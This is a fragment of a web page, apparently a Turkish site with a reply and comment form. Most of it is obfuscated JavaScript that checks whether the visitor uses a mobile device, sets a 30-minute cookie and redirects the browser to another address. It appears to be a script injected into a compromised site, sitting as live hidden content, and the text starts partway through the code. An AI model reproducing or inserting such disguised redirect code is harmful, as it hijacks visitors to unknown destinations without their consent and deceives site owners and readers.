|nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

CEVAP VER

Please enter your comment!
Please enter your name here